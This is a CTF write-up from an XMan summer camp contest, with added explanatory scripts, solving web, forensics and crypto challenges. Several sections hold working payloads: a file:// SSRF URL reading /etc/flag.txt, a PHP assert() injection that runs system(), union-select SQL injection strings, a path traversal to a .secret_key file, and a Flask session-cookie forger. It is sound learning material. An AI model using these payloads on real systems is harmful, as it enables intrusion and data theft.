0x00 : Introduction
XMan
3rd summer camp, individual ranking match. Over the 10 days of training I met 梅子酒, 麦香, 1phan, p0, Xu and many other masters; tqltql (太强了, they are incredibly strong).
0x01 : Simple SSRF
flag format: XMAN{.*}
hint: curl
hint: the flag is in /etc/flag.txt
Before the hints came out I was looking at misc; only afterwards did I start on this challenge.
The challenge comes down to three points:
- read a local file with the file protocol (the back end fetches with curl, which accepts file:// URLs)
- bypass the host check (the allow-listed host goes into the authority part of the URL; the curl of that time ignored the host of a file:// URL, whereas curl 7.62 and later rejects any host other than localhost or 127.0.0.1 there)
- truncate the url (I used # for this: whatever gets appended after it is only a fragment, and curl never sends fragments)
payload :
file://www.baidu.com/etc/flag.txt#
XMAN{f1l3_pr0toc0l_1s_us3ful}
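As an added illustration (not code from the challenge or the writeup), the snippet below reconstructs the class of check the payload defeats: naive_host_check() is a hypothetical validator that only inspects the host, hardened_check() additionally allow-lists the scheme and refuses credentials and fragments, and path_seen_by_fetcher() shows that a suffix appended after the trailing # is never part of the requested path. The allow-listed host www.baidu.com is taken from the payload; the challenge's real check is not known.

```python
from urllib.parse import urlparse

# Assumed allow-listed host, taken from the payload. naive_host_check() is a
# hypothetical reconstruction of the kind of check the file:// payload bypasses.
ALLOWED_HOST = "www.baidu.com"
ALLOWED_SCHEMES = {"http", "https"}

PAYLOAD = "file://www.baidu.com/etc/flag.txt#"


def naive_host_check(url: str) -> bool:
    """Only looks at the authority part: file://www.baidu.com/... passes."""
    return urlparse(url).hostname == ALLOWED_HOST


def hardened_check(url: str) -> bool:
    """Allow-list the scheme too, pin the host exactly, and refuse user-info and
    fragments so the URL the checker sees is the URL the fetcher will use."""
    u = urlparse(url)
    if u.scheme not in ALLOWED_SCHEMES:
        return False                      # file://, gopher://, dict:// ... all out
    if u.hostname != ALLOWED_HOST:
        return False                      # also catches www.baidu.com.evil.example
    if u.username is not None or u.password is not None:
        return False                      # http://www.baidu.com@evil.example/
    if "#" in url:
        return False                      # a trailing # would swallow appended text
    return True


def path_seen_by_fetcher(url: str) -> str:
    """curl does not transmit the fragment, so everything after # is dropped.
    Returns the path component that is actually requested."""
    return urlparse(url).path


if __name__ == "__main__":
    for url in (PAYLOAD, "https://www.baidu.com/", "http://www.baidu.com@evil.example/"):
        print(url, naive_host_check(url), hardened_check(url))
    # the server appending "/suffix" after the payload changes nothing for curl
    print(path_seen_by_fetcher(PAYLOAD + "/suffix/added/by/server"))
```

The interesting line is the scheme allow-list: a host check alone says nothing about which protocol handler curl will dispatch to, and the fragment rule closes the truncation trick independently of what the server concatenates.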
0x02 : makeit
flag format: XMAN{.*}
The challenge hints at a git leak; pulling the repository with GitHack and scanning it gives the source.
Key code:
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
payload:
/?page=','..')===false and system('cat templates/flag.php');//
Because $file is interpolated into the string that assert() evaluates as PHP code, the first assert becomes:
assert("strpos('templates/','..')===false and system('cat templates/flag.php');//.php','..') === false") or die("Detected hacking attempt!");
The quote in the payload closes the first argument of strpos(), the `and system(...)` runs the command, and `//` comments out the leftover `.php','..') === false`, so the statement parses and runs; the second assert is never reached because `or die()` only fires if the first one evaluates to false.
XMAN{flag_is_so_cool}
0x03 : bbsqli
flag format: XMAN{.*}
The challenge has a session injection: a value taken from the session ends up in the query, so a union select through it reads the database.
' union select 1,database()#
sqli #database name
' union select 1,group_concat(table_name) from information_schema.TABLES where table_schema='sqli'#
[GDJM_flag],secrets #table names
' union select 1,group_concat(column_name) from information_schema.columns where
flag #column name
' union select 1,flag from `[GDJM_flag]`#
xman{YoVr_4R3_a_Bada5s_Ge7_My_Fl4g} #flag
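The enumeration above, replayed end to end as an added example that is not the challenge's code: an in-memory SQLite database with the same table shape (users, secrets and `[GDJM_flag]`, flag value constructed), a profile_vulnerable() function that pastes the session username into SQL the way an injectable session lookup does, and profile_fixed() with a bound parameter. SQLite has no information_schema and ends comments with -- rather than MySQL's #, so the three enumeration payloads are the SQLite equivalents of the writeup's queries.

```python
import sqlite3

# Constructed sample data; the challenge ran on MySQL and its real flag is not used here.
FLAG = "xman{constructed_sample_flag}"


def build_db():
    """In-memory database with the table layout the writeup enumerated."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, bio TEXT);
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, note TEXT);
        CREATE TABLE `[GDJM_flag]` (id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO users (username, bio) VALUES ('alice', 'just a user');
        INSERT INTO secrets (note) VALUES ('nothing to see');
    """)
    conn.execute("INSERT INTO `[GDJM_flag]` (flag) VALUES (?)", (FLAG,))
    conn.commit()
    return conn


def profile_vulnerable(conn, session_username):
    """Assumed vulnerable pattern: the username stored in the session is pasted
    into the SQL text, so a quote in it changes the query."""
    sql = "SELECT id, bio FROM users WHERE username = '%s'" % session_username
    return conn.execute(sql).fetchall()


def profile_fixed(conn, session_username):
    """Same lookup with a bound parameter: the session value can only be data."""
    return conn.execute("SELECT id, bio FROM users WHERE username = ?",
                        (session_username,)).fetchall()


# SQLite counterparts of the writeup's three steps (sqlite_master instead of
# information_schema, `-- ` instead of `#`).
PAYLOADS = {
    "tables":  "' union select 1, group_concat(name) from sqlite_master where type='table'-- ",
    "columns": "' union select 1, sql from sqlite_master where name='[GDJM_flag]'-- ",
    "flag":    "' union select 1, flag from `[GDJM_flag]`-- ",
}


def enumerate_via_union(conn):
    """Runs every payload through the vulnerable lookup; returns {step: rows}."""
    return {step: profile_vulnerable(conn, payload) for step, payload in PAYLOADS.items()}


if __name__ == "__main__":
    db = build_db()
    for step, rows in enumerate_via_union(db).items():
        print(step, rows)
    print("fixed:", profile_fixed(db, PAYLOADS["flag"]))   # [] - the quote is just data
```

The union works because the injected select has the same number of columns (two) as the original; the writeup's `1,` filler plays the same role for the MySQL table.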
0x04 : bbsqli
flag format:
flag{.*}
The source is provided directly.
Clearly, once session['flag'] is true we get the flag. The session here is signed with secret_key, so obtaining secret_key lets us forge a session ourselves.
Auditing the code reveals a directory traversal:
@users.route('/asserts/<path:path>')
def static_handler(path):
filename = os.path.join(app.root_path,'asserts',path)
if os.path.isfile(filename):
return send_file(filename)
else:
abort(404)
The key can be read at /asserts/..%2f..%2f.secret_key (the route is /asserts/; percent-encoding the slashes stops the client from collapsing the .. segments before they are sent, the path converter decodes them back, and os.path.join walks straight out of the asserts directory). With the key, set up the application locally, generate a session with flag set to true, submit it and the flag comes back.
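The "set up the application locally and generate a session" step does not actually need Flask: the cookie is an itsdangerous URLSafeTimedSerializer token, and the added example below (not the challenge's code) rebuilds it with the standard library only. It mirrors Flask's SecureCookieSessionInterface: compact JSON payload (optionally zlib-compressed, marked by a leading dot), a base64 timestamp, and an HMAC-SHA1 whose key is HMAC-SHA1(secret_key, "cookie-session"). The secret key is a constructed stand-in for the leaked .secret_key, and the timestamp is encoded as a plain big-endian integer as itsdangerous 2.x does (1.x subtracts an epoch offset, which only changes that middle field).

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# Constructed key standing in for the leaked .secret_key; the real key is not known here.
SECRET_KEY = b"constructed-demo-secret-key"
SALT = b"cookie-session"   # salt used by Flask's session serializer


def _b64(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")


def _unb64(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def _derived_key(secret_key: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret, salt)
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def forge_session(data: dict, secret_key: bytes, timestamp: int = None) -> str:
    """Builds payload.base64(timestamp).base64(HMAC-SHA1) in Flask's cookie layout."""
    payload = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = b"." + _b64(compressed)          # leading dot = zlib-compressed payload
    else:
        body = _b64(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    signed_part = body + b"." + _b64(ts_bytes)
    sig = hmac.new(_derived_key(secret_key), signed_part, hashlib.sha1).digest()
    return (signed_part + b"." + _b64(sig)).decode()


def verify_session(cookie: str, secret_key: bytes):
    """Returns the session dict if the signature checks out, otherwise None."""
    raw = cookie.encode()
    signed_part, _, sig = raw.rpartition(b".")
    expected = hmac.new(_derived_key(secret_key), signed_part, hashlib.sha1).digest()
    if not hmac.compare_digest(_b64(expected), sig):
        return None
    body, _, _ts = signed_part.rpartition(b".")   # base64 has no dots, so this is safe
    if body.startswith(b"."):
        payload = zlib.decompress(_unb64(body[1:]))
    else:
        payload = _unb64(body)
    return json.loads(payload)


if __name__ == "__main__":
    cookie = forge_session({"flag": True, "user": "guest"}, SECRET_KEY)
    print(cookie)
    print(verify_session(cookie, SECRET_KEY))
```

verify_session() is what the server does with the forged cookie; it succeeds only because the attacker holds the same secret_key, which is the whole reason the traversal to .secret_key matters.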
0x05 : File
root@kali:~/Desktop# mkdir tmp ; mount task_file.img tmp ; ls -larth tmp
mkdir: cannot create directory ‘tmp’: File exists
total 7.3M
drwx------ 2 root root 12K Mar 4 2015 lost+found
-rw-r--r-- 1 root root 64K Mar 4 2015 cat.jpg
-rw-r--r-- 1 root root 173K Mar 4 2015 cat2.jpg
-rw-r--r-- 1 root root 86K Mar 4 2015 cat3.jpg
-rw-r--r-- 1 root root 53K Mar 4 2015 cat4.jpg
-rw-r--r-- 1 root root 114K Mar 4 2015 cat5.jpg
-rw-r--r-- 1 root root 72K Mar 4 2015 cat6.jpg
-rw-r--r-- 1 root root 67K Mar 4 2015 cat7.jpg
-rw-r--r-- 1 root root 49K Mar 4 2015 cat8.jpg
-rw-r--r-- 1 root root 500K Mar 4 2015 catdog.gif
-rw-r--r-- 1 root root 805K Mar 4 2015 catgif.gif
-rw-r--r-- 1 root root 2.0M Mar 4 2015 catsipsip.gif
-rw-r--r-- 1 root root 70K Mar 4 2015 catreindeer.jpg
-rw-r--r-- 1 root root 36K Mar 4 2015 catyum.gif
-rw-r--r-- 1 1000 users 1.1M Mar 4 2015 catfunnyface.jpg
-rw-r--r-- 1 1000 users 2.0M Mar 4 2015 catcuddle.gif
-rw-r--r-- 1 1000 users 203K Mar 4 2015 catwindow.jpg
drwxr-xr-x 3 root root 1.0K Mar 4 2015 .
drwxr-xr-x 18 root root 4.0K Aug 10 13:35 ..
But the image is 10M, so something else is probably hidden in it; time for a tool.
root@kali:~/Desktop# extundelete --restore-all task_file.img
NOTICE: Extended attributes are not restored.
WARNING: EXT3_FEATURE_INCOMPAT_RECOVER is set.
The partition should be unmounted to undelete any files without further data loss.
If the partition is not currently mounted, this message indicates
it was improperly unmounted, and you should run fsck before continuing.
If you decide to continue, extundelete may overwrite some of the deleted
files and make recovering those files impossible. You should unmount the
file system and check it with fsck before using extundelete.
Would you like to continue? (y/n)
y
Loading filesystem metadata ... 2 groups loaded.
Loading journal descriptors ... 146 descriptors loaded.
Searching for recoverable inodes in directory / ...
2 recoverable inodes found.
Looking through the directory structure for deleted files ...
1 recoverable inodes still lost.
root@kali:~/Desktop# cd RECOVERED_FILES/
root@kali:~/Desktop/RECOVERED_FILES# ls -larth
total 24K
-rw-r--r-- 1 root root 12K Aug 10 13:36 file.17
-rw-r--r-- 1 root root 54 Aug 10 13:36 .cat.jpg
drwxr-xr-x 19 root root 4.0K Aug 10 13:36 ..
drwxr-xr-x 2 root root 4.0K Aug 10 13:36 .
root@kali:~/Desktop/RECOVERED_FILES# file file.17 .cat.jpg
file.17: Vim swap file, version 7.4
.cat.jpg: data
root@kali:~/Desktop/RECOVERED_FILES# cat .cat.jpg
flag{fugly_cats_need_luv_2}
root@kali:~/Desktop/RECOVERED_FILES# cat file.17
b0VIM 7.4�
U3210#"! Utpad���f l a g { f u g l y _ c a t s _ n e e d _ l u v _ 2 }root@kali:~/Desktop/RECOVERED_FILES#
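When the filesystem is mounted and extundelete's warning about further data loss applies, a read-only carve of the raw image is a safe cross-check. The added example below (not the writeup's code) scans a constructed stand-in for task_file.img for known signatures (the b0VIM swap header and a JPEG, among others) and for flag-shaped strings, both as plain bytes and with interleaved NUL bytes stripped, since the recovered swap file above printed its text one character at a time. The sample image and the flag values in it are made up for the demonstration.

```python
import re

# Constructed stand-in for a raw image: filler, a Vim swap header followed by
# NUL-interleaved text, a JPEG header, and a plain flag string. Not task_file.img.
SAMPLE_IMAGE = (
    b"\x00" * 512
    + b"b0VIM 7.4\x00" + b"\x00" * 32
    + b"f\x00l\x00a\x00g\x00{\x00d\x00e\x00m\x00o\x00}\x00"
    + b"\xff" * 256
    + b"\xff\xd8\xff\xe0JFIF" + b"\x00" * 64
    + b"xman{constructed_example}\n"
    + b"\x00" * 512
)

FLAG_RE = re.compile(rb"(?:flag|xman|XMAN)\{[^{}\x00]{1,80}\}")

MAGICS = {
    b"b0VIM": "vim swap file",
    b"\xff\xd8\xff": "jpeg",
    b"PK\x03\x04": "zip",
    b"\x7fELF": "elf",
}


def find_magics(image: bytes):
    """(offset, type) for every known signature, the check `file` applies per object."""
    hits = []
    for magic, name in MAGICS.items():
        start = 0
        while True:
            idx = image.find(magic, start)
            if idx == -1:
                break
            hits.append((idx, name))
            start = idx + 1
    return sorted(hits)


def find_flags(image: bytes):
    """Flag-shaped strings from the raw bytes and from a NUL-stripped copy.
    The second pass catches text stored one character per two bytes; it is a
    heuristic and can join unrelated bytes, so treat hits as leads to confirm."""
    found = {m.group().decode() for m in FLAG_RE.finditer(image)}
    denulled = image.replace(b"\x00", b"")
    found.update(m.group().decode() for m in FLAG_RE.finditer(denulled))
    return sorted(found)


if __name__ == "__main__":
    for offset, kind in find_magics(SAMPLE_IMAGE):
        print("0x%08x %s" % (offset, kind))
    print(find_flags(SAMPLE_IMAGE))
```

On a real image, read it with open(path, "rb").read() (or mmap for large ones) and feed the bytes to the two functions; nothing is written back to the image.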
0x06 : XMan通行证
The XMan "strongest king" event has begun; get your pass and start your road to the throne.
XMan通行证 flag format: xman{.*}
hint: this is a sign-in challenge;
hint: base64 decode, then rail fence encrypt, then decrypt with a Caesar cipher
(the hardest sign-in challenge I have ever done)
Because so few people solved it, the organizers ended up releasing the writeup, which is a bit too real... (I would not have solved it even with the writeup)
a2FuYmJyZ2doamx7emJfX19ffXZ0bGFsbg==
base64
kanbbrgghjl{zb____}vtlaln
rail fence (7 rails, encrypt)
kzna{blnl_abj_lbh_trg_vg}
Caesar (shift 13)
xman{oyay_now_you_get_it}
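The three steps above, carried out in code as an added example (not the organizers' or the author's script). Note the direction of the middle step: the hint says rail fence encryption, and the intermediate value is indeed the zigzag rail-fence encryption of the base64 output with 7 rails, not its decryption. The Caesar step is brute-forced over all 26 shifts and the one producing the xman{ prefix is kept, so the shift does not need to be known in advance.

```python
import base64
import string

CIPHERTEXT = "a2FuYmJyZ2doamx7emJfX19ffXZ0bGFsbg=="   # the challenge string


def rail_fence_encrypt(text: str, rails: int) -> str:
    """Zigzag rail fence: write the text down and up across `rails` rows, then
    read the rows one after another."""
    if rails < 2:
        return text
    rows = [[] for _ in range(rails)]
    row, step = 0, 1
    for ch in text:
        rows[row].append(ch)
        if row == 0:
            step = 1
        elif row == rails - 1:
            step = -1
        row += step
    return "".join("".join(r) for r in rows)


def caesar(text: str, shift: int) -> str:
    """Shift letters by `shift`; non-letters such as { } _ pass through."""
    lo, up = string.ascii_lowercase, string.ascii_uppercase
    table = str.maketrans(lo + up, lo[shift:] + lo[:shift] + up[shift:] + up[:shift])
    return text.translate(table)


def solve(b64: str = CIPHERTEXT, rails: int = 7, prefix: str = "xman{") -> dict:
    """Returns every intermediate value plus the Caesar shift that yields `prefix`."""
    stage1 = base64.b64decode(b64).decode()
    stage2 = rail_fence_encrypt(stage1, rails)
    for shift in range(26):
        candidate = caesar(stage2, shift)
        if candidate.startswith(prefix):
            return {"base64": stage1, "railfence": stage2, "shift": shift, "flag": candidate}
    raise ValueError("no Caesar shift produces the expected prefix")


if __name__ == "__main__":
    for k, v in solve().items():
        print(k, v)
```

If a rail-fence tool gives a different middle value, it is almost certainly implementing the columnar variant (write in rows of n, read columns) rather than the zigzag used here; with 7 "rails" the two are not the same permutation.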
0x07 : ppap
flag format: flag{.*}
The capture contains a long run of base64; decoding it turns up a jpg file header.
I wrote a script to base64-decode it and write the result to a file:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import base64

# 1.txt holds the base64 lines pulled out of the capture; decode each line and
# append the bytes to 1.jpg (binary mode, so nothing gets mangled on write)
with open('1.txt', 'r') as src, open('1.jpg', 'wb') as dst:
    for line in src:
        line = line.strip()
        if not line:
            continue
        dst.write(base64.b64decode(line))
The decoding failed halfway through: there is a stretch of English text in the middle of the base64.
Working through to the end it is easy to see there are three files: a jpg that itself contains many jpg files, a zip file, and an xml file.
The zip contains flag.txt and is encrypted, so clearly the task is to get the password.
I had no idea how to proceed; I googled it and unexpectedly found the original challenge... awkward.
0x08 : autokey
flag format: flag{.*}
I did not solve this one during the competition, but I was only one step away, so I am writing it down.
First the classic USB keystroke extraction, dumping the HID report of each packet (usb.capdata is the leftover-capture-data field tshark exposes for USB frames):
tshark -r task_AutoKey.pcapng -T fields -e usb.capdata > usbdata.txt
Then a script found online decodes the USB keystrokes.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# USB HID keycode (byte 2 of the 8-byte boot-keyboard report) -> character.
# The modifier byte is not decoded, so shifted symbols come out as their unshifted
# key; 0x2a is Backspace and is rendered as [DEL] (0x2b is really Tab).
mappings = { 0x04:"A", 0x05:"B", 0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G", 0x0B:"H", 0x0C:"I", 0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O", 0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5", 0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]", 0X2B:" ", 0x2C:" ", 0x2D:"-", 0x2E:"=", 0x2F:"[", 0x30:"]", 0x31:"\\", 0x32:"~", 0x33:";", 0x34:"'", 0x36:",", 0x37:"." }
nums = []
keys = open('usbdata.txt')
for line in keys:
    # each line looks like "00:00:04:00:00:00:00:00"; keep only reports with no
    # modifier held and a single key down (every byte except byte 2 is zero)
    if line[0]!='0' or line[1]!='0' or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0':
        continue
    nums.append(int(line[6:8],16))   # byte 2 = keycode
keys.close()
output = ""
for n in nums:
    if n == 0:         # key-release report
        continue
    output += mappings.get(n, '[unknown]')
print('output :\n' + output)
Which gives:
output :
[unknown]A[unknown]UTOKEY''.DECIPHER'[unknown]MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXO[DEL]PZE[DEL]IZ'
Dropping the [unknown] markers and treating each [DEL] as deleting the character after it gives
AUTOKEY''.DECIPHER'MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXOZEZ'
(Strictly, HID code 0x2a is Backspace, which erases the character typed before it; read that way the tail is ...VEXPZIZ, which is the spelling the brute-force script below actually uses. Either way only the last few letters differ.)
The autokey here matches the challenge name, and the string looks very much like ciphertext, so I looked up the autokey cipher: it needs a keyword, which can also be understood as the key.
I did not see a key anywhere, so I wrote a script to brute-force it.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pycipher import Autokey
import itertools as its

# note the tail VEXPZIZ: this reads each [DEL] as Backspace erasing the previous character
CIPHERTEXT = 'MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXPZIZ'
dictionary = 'QWERTYUIOPASDFGHJKLZXCVBNM'
# repeat = key length to brute-force; every key and its decryption is written to
# flag.txt so the result can be grepped for something flag-shaped afterwards
with open('flag.txt', 'w') as f:
    for i in its.product(dictionary, repeat=4):
        key = "".join(i)
        a = Autokey(key).decipher(CIPHERTEXT)
        f.write(key + "\n")
        f.write(a + "\n")
Changing the repeat parameter sets the key length to brute-force. With the key hell I got a string that looks like a flag:
>>> print Autokey('hell').decipher('MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOGVIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXOZEZ')
FLAGQUFWJKTSLZMRZZPGHAGXZQUXSUDCWRHMPEMIQXZJXMFJTWONHLJALXAXEQMSHCVKCZYOFAGMGOAJCMAZQGPMPBWTDVJLEOERNIDCVFPKFHMLZQCOFJ
But that is not the flag.... and that is where my train of thought stopped.
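The "FLAG followed by garbage" result has a precise explanation in how the autokey cipher works, and the added example below (not the writeup's script; standard library only, so pycipher is not needed) makes it testable. The running key is the keyword followed by the plaintext itself, so a keyword guess is only ever tested against the first len(keyword) letters: a four-letter key that starts the output with FLAG proves that the real keyword begins with HELL but says nothing about whether it continues. Conversely, a known plaintext prefix (crib) gives those key letters directly as C[i] - P[i], with no brute force at all; recovering the rest of a longer keyword needs a longer crib or a word list of candidates beginning with the recovered prefix, which this example does not attempt. The ciphertext is the one recovered from the keystrokes above.

```python
import string

ALPHA = string.ascii_uppercase

# Ciphertext typed in the capture (the [DEL]-as-Backspace reading changes only the tail).
CIPHERTEXT = ("MPLRVFFCZEYOUJFJKYBXGZVDGQAURKXZOLKOLVTUFBLRNJESQITWAHXNSIJXPNMPLSHCJBTYHZEALOG"
              "VIAAISSPLFHLFSWFEHJNCRWHTINSMAMBVEXOZEZ")


def _letters(s: str):
    return [c for c in s.upper() if c in ALPHA]


def autokey_encipher(plaintext: str, key: str) -> str:
    """Vigenère autokey: running key = keyword + plaintext; C[i] = P[i] + K[i]."""
    p = _letters(plaintext)
    k = _letters(key) + p
    return "".join(ALPHA[(ALPHA.index(pc) + ALPHA.index(kc)) % 26] for pc, kc in zip(p, k))


def autokey_decipher(ciphertext: str, key: str) -> str:
    """Each recovered plaintext letter is appended to the running key, so the
    keyword only governs the first len(key) letters; after that, a wrong or
    too-short keyword derails every following letter."""
    c = _letters(ciphertext)
    k = _letters(key)
    out = []
    for i, cc in enumerate(c):
        pc = ALPHA[(ALPHA.index(cc) - ALPHA.index(k[i])) % 26]
        out.append(pc)
        k.append(pc)
    return "".join(out)


def key_from_crib(ciphertext: str, crib: str) -> str:
    """Known-plaintext shortcut: if the message starts with `crib`, then for
    i < len(keyword) the key letter is C[i] - P[i]. The result is the keyword
    prefix as long as the crib is no longer than the keyword."""
    c = _letters(ciphertext)
    return "".join(ALPHA[(ALPHA.index(c[i]) - ALPHA.index(p)) % 26]
                   for i, p in enumerate(_letters(crib)))


if __name__ == "__main__":
    print(key_from_crib(CIPHERTEXT, "FLAG"))          # the prefix the brute force found
    print(autokey_decipher(CIPHERTEXT, "HELL")[:16])  # FLAG..., then noise
```

Running the crib against the ciphertext returns HELL in one step, the same answer the 26^4 brute force produced; the remaining question, how long the keyword really is, is exactly what the four-letter search could not answer.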
That evening I saw in the logs that some masters got the flag straight from the USB traffic; I am envious and hope they will teach me how to write that script.
余老师 is awesome.